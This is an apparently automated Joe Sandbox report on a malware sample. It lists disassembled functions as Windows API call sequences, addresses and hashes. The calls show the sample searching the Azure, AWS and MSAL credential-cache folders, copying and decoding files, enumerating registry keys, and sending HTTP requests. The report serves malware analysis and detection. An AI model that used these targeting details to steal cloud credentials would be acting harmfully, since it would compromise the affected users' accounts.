                                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                    • String ID:
                                    • API String ID: 3689735781-0
                                    • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                    • Instruction ID: 009cf09e9642fed17e3f9831fd49c084686e42f1abb8e6eddd178158d9d8061c
                                    • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                    • Instruction Fuzzy Hash: E8D112B5A4020CFBCB04EBE4DD5AEFD7779BF14300F508519F206A6291DE78AA49CB61
                                    APIs
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                      • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                      • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                                    • StrCmpCA.SHLWAPI(?,00A1B398), ref: 00405A13
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                                    • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00A1B388,00000000,?,00A14A48,00000000,?,00421A1C), ref: 00405E71
                                    • lstrlenA.KERNEL32(00000000), ref: 00405E82
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                                    • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                                    • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                                    • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                    • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                                    • memcpy.MSVCRT(?), ref: 00405EFE
                                    • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                                    • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                                    • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                                    • HttpOpenRequestA.WININET(00000000,00A1B218,?,00A1A780,00000000,00000000,00400100,00000000), ref: 00405BF8
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 1406981993-2180234286
                                    • Opcode ID: 29c6a945f459f2f8c1075a72b727d682fe226b594e8a99ac19100750237bb99c
                                    • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                    • Opcode Fuzzy Hash: 29c6a945f459f2f8c1075a72b727d682fe226b594e8a99ac19100750237bb99c
                                    • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                    APIs
                                    • memset.MSVCRT ref: 00414D87
                                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                    • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                                    • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                      • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                    • memset.MSVCRT ref: 00414E13
                                    • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                                    • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                      • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                      • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                    • memset.MSVCRT ref: 00414E9F
                                    • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                                    • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                      • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00A130A0,?,000003E8), ref: 00414A4A
                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                      • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                      • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                    • memset.MSVCRT ref: 00414F2B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                    • API String ID: 4017274736-156832076
                                    • Opcode ID: c1a912e1918b28a31d7af5b1191f4ab077717743ad3d56635481e1ea4761ad81
                                    • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                    • Opcode Fuzzy Hash: c1a912e1918b28a31d7af5b1191f4ab077717743ad3d56635481e1ea4761ad81
                                    • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                      • Part of subcall function 007F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,007E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 007F8DED
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007ED1EA
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 007ED32E
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007ED335
                                    • lstrcat.KERNEL32(?,00000000), ref: 007ED46F
                                    • lstrcat.KERNEL32(?,00421478), ref: 007ED47E
                                    • lstrcat.KERNEL32(?,00000000), ref: 007ED491
                                    • lstrcat.KERNEL32(?,0042147C), ref: 007ED4A0
                                    • lstrcat.KERNEL32(?,00000000), ref: 007ED4B3
                                    • lstrcat.KERNEL32(?,00421480), ref: 007ED4C2
                                    • lstrcat.KERNEL32(?,00000000), ref: 007ED4D5
                                    • lstrcat.KERNEL32(?,00421484), ref: 007ED4E4
                                    • lstrcat.KERNEL32(?,00000000), ref: 007ED4F7
                                    • lstrcat.KERNEL32(?,00421488), ref: 007ED506
                                    • lstrcat.KERNEL32(?,00000000), ref: 007ED519
                                    • lstrcat.KERNEL32(?,0042148C), ref: 007ED528
                                    • lstrcat.KERNEL32(?,00000000), ref: 007ED53B
                                    • lstrcat.KERNEL32(?,00421490), ref: 007ED54A
                                      • Part of subcall function 007FAA87: lstrlen.KERNEL32(007E516C,?,?,007E516C,00420DDE), ref: 007FAA92
                                      • Part of subcall function 007FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 007FAAEC
                                    • lstrlen.KERNEL32(?), ref: 007ED591
                                    • lstrlen.KERNEL32(?), ref: 007ED5A0
                                    • memset.MSVCRT ref: 007ED5EF
                                      • Part of subcall function 007FACD7: StrCmpCA.SHLWAPI(0064A350,007EAA0E,?,007EAA0E,0064A350), ref: 007FACF6
                                    • DeleteFileA.KERNEL32(00000000), ref: 007ED61B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                    • String ID:
                                    • API String ID: 1973479514-0
                                    • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                    • Instruction ID: 26b3cdee88c9a091cb329a47e9b70a1591e9e2559807beb3d593ed9627353a15
                                    • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                    • Instruction Fuzzy Hash: 20E10FB5950218FBCB04FBE0DD5ADFE7379AF14301F504159F20AA6291DE396E09CB62
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00A14A78,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                                    • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                                    • lstrcatA.KERNEL32(?,00000000,00A12DF0,00421474,00A12DF0,00421470,00000000), ref: 0040D208
                                    • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                                    • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                                    • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                                    • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                                    • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                                    • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                                    • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                      • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00A12D90,?,0042110C,?,00000000), ref: 0041A82B
                                      • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                    • lstrlenA.KERNEL32(?), ref: 0040D32A
                                    • lstrlenA.KERNEL32(?), ref: 0040D339
                                    • memset.MSVCRT ref: 0040D388
                                      • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                                    • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                    • String ID:
                                    • API String ID: 2775534915-0
                                    • Opcode ID: a4f97debc43b6bb646af20662aa76c17e404fc0e6804846b70a1b628625fc9e7
                                    • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                                    • Opcode Fuzzy Hash: a4f97debc43b6bb646af20662aa76c17e404fc0e6804846b70a1b628625fc9e7
                                    • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                                    APIs
                                      • Part of subcall function 007FAA07: lstrcpy.KERNEL32(?,00000000), ref: 007FAA4D
                                      • Part of subcall function 007E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A51
                                      • Part of subcall function 007E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A68
                                      • Part of subcall function 007E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A7F
                                      • Part of subcall function 007E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007E4AA0
                                      • Part of subcall function 007E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 007E4AB0
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007E5C5F
                                    • StrCmpCA.SHLWAPI(?,0064A480), ref: 007E5C7A
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007E5DFA
                                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 007E60D8
                                    • lstrlen.KERNEL32(00000000), ref: 007E60E9
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 007E60FA
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007E6101
                                    • lstrlen.KERNEL32(00000000), ref: 007E6116
                                    • memcpy.MSVCRT(?,00000000,00000000), ref: 007E612D
                                    • lstrlen.KERNEL32(00000000), ref: 007E613F
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 007E6158
                                    • memcpy.MSVCRT(?), ref: 007E6165
                                    • lstrlen.KERNEL32(00000000,?,?), ref: 007E6182
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 007E6196
                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 007E61B3
                                    • InternetCloseHandle.WININET(00000000), ref: 007E6217
                                    • InternetCloseHandle.WININET(00000000), ref: 007E6224
                                    • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 007E5E5F
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                    • InternetCloseHandle.WININET(00000000), ref: 007E622E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                    • String ID:
                                    • API String ID: 1703137719-0
                                    • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                    • Instruction ID: 5cb8bf1880a42c76b69897584c399bfc3993bbd7389eef40dff75117fc46e0b3
                                    • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                    • Instruction Fuzzy Hash: C012CEB195021CFACB15EBA0DD99EFEB379BF14700F504199B20A62291DF742B89CF51
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 007ECCD3
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 007ECCF0
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 007ECCFC
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 007ECD0F
                                    • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 007ECD1C
                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 007ECD40
                                    • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 007ECD5E
                                    • StrStrA.SHLWAPI(00000000,0064A364), ref: 007ECD85
                                    • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 007ECF09
                                    • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 007ECF20
                                      • Part of subcall function 007ECA87: memset.MSVCRT ref: 007ECABA
                                      • Part of subcall function 007ECA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 007ECAD8
                                      • Part of subcall function 007ECA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 007ECAE3
                                      • Part of subcall function 007ECA87: memcpy.MSVCRT(?,?,?), ref: 007ECB79
                                    • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 007ECFC1
                                    • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 007ECFD8
                                      • Part of subcall function 007ECA87: lstrcat.KERNEL32(?,00420B46), ref: 007ECBAA
                                      • Part of subcall function 007ECA87: lstrcat.KERNEL32(?,00420B47), ref: 007ECBBE
                                      • Part of subcall function 007ECA87: lstrcat.KERNEL32(?,00420B4E), ref: 007ECBDF
                                    • lstrlen.KERNEL32(00000000), ref: 007ED0AB
                                    • CloseHandle.KERNEL32(00000000), ref: 007ED103
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                    • String ID:
                                    • API String ID: 3555725114-3916222277
                                    • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                    • Instruction ID: 4e98699142c9e6ee8c06f428794e90d2970adca8e753cd2674c861f0ebb81b59
                                    • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                    • Instruction Fuzzy Hash: 4AE1B1B591010CFBCB15EBA4DD99EFEB779AF14300F408159F20A66292DF386A49CF61
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00A196D0,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                                    • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                                    • StrStrA.SHLWAPI(?,00A197C0,00420B52), ref: 0040CAF7
                                    • StrStrA.SHLWAPI(00000000,00A19718), ref: 0040CB1E
                                    • StrStrA.SHLWAPI(?,00A19F00,00000000,?,00421458,00000000,?,00000000,00000000,?,00A12EE0,00000000,?,00421454,00000000,?), ref: 0040CCA2
                                    • StrStrA.SHLWAPI(00000000,00A19EA0), ref: 0040CCB9
                                      • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                      • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00A12E70), ref: 0040C871
                                      • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                      • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                                    • StrStrA.SHLWAPI(?,00A19EA0,00000000,?,0042145C,00000000,?,00000000,00A12E70), ref: 0040CD5A
                                    • StrStrA.SHLWAPI(00000000,00A12FB0), ref: 0040CD71
                                      • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                      • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                      • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                    • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                                    • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                    • String ID:
                                    • API String ID: 3555725114-3916222277
                                    • Opcode ID: ab42b5dea98dda6d1ec903180b661801f10a54a23581749008f7fe7b71c2160c
                                    • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                                    • Opcode Fuzzy Hash: ab42b5dea98dda6d1ec903180b661801f10a54a23581749008f7fe7b71c2160c
                                    • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • RegOpenKeyExA.ADVAPI32(00000000,00A16A40,00000000,00020019,00000000,004205B6), ref: 004183A4
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                    • wsprintfA.USER32 ref: 00418459
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
